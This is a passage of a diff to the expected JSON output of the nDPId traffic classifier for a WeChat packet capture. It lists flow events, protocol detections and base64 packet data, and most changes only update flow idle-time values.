-00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} @@ -495,54 +495,54 @@ 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171164904,"flow_last_seen":1492171164904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171164904,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1492171164904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171164904,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRVAAEAG2hjAqAFnX2UiIpknAFAjQjGZFOMj7IAQBf7IcQAAAQEICgA\/RIBwfIhZ"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166312,"flow_last_seen":1492171166312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166312,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1492171166312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166312,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/65AAEAG93\/AqAFnX2UiIYi0AFB\/4ffk18M9+4AQCyPvSAAAAQEICgA\/ReBr6XAp"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166440,"flow_last_seen":1492171166440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166440,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1492171166440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166440,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqRAAEAGaIrAqAFnX2UiIYi3AFBZ1tlh3d8I5IAQBaRnrgAAAQEICgA\/RgBr6XCp"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166696,"flow_last_seen":1492171166696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166696,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1492171166696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166696,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7pAAEAGr3TAqAFnX2UiIYi4AFDlnJrhImFMS4AQCdyNBgAAAQEICgA\/RkBr6XGp"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nhAAEAGJLXAqAFnX2UiIpk\/AFBMVGJPaE9vZoAQBU7AugAAAQEICgA\/R6BwfJTZ"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171164904,"flow_last_seen":1492171164904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171164904,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1492171164904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171164904,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRVAAEAG2hjAqAFnX2UiIpknAFAjQjGZFOMj7IAQBf7IcQAAAQEICgA\/RIBwfIhZ"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166312,"flow_last_seen":1492171166312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166312,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1492171166312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166312,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/65AAEAG93\/AqAFnX2UiIYi0AFB\/4ffk18M9+4AQCyPvSAAAAQEICgA\/ReBr6XAp"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166440,"flow_last_seen":1492171166440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166440,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1492171166440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166440,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqRAAEAGaIrAqAFnX2UiIYi3AFBZ1tlh3d8I5IAQBaRnrgAAAQEICgA\/RgBr6XCp"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166696,"flow_last_seen":1492171166696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166696,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1492171166696,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166696,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7pAAEAGr3TAqAFnX2UiIYi4AFDlnJrhImFMS4AQCdyNBgAAAQEICgA\/RkBr6XGp"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nhAAEAGJLXAqAFnX2UiIpk\/AFBMVGJPaE9vZoAQBU7AugAAAQEICgA\/R6BwfJTZ"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1492171169377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1492171169377,"pkt":"8IQvSpdgeJKcD6iOCABFEABMYzZAAEAR4JXAqAFnwcxy6ZLKAHsAOA7KIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANybOCEWgBhs"} 00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} -02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXla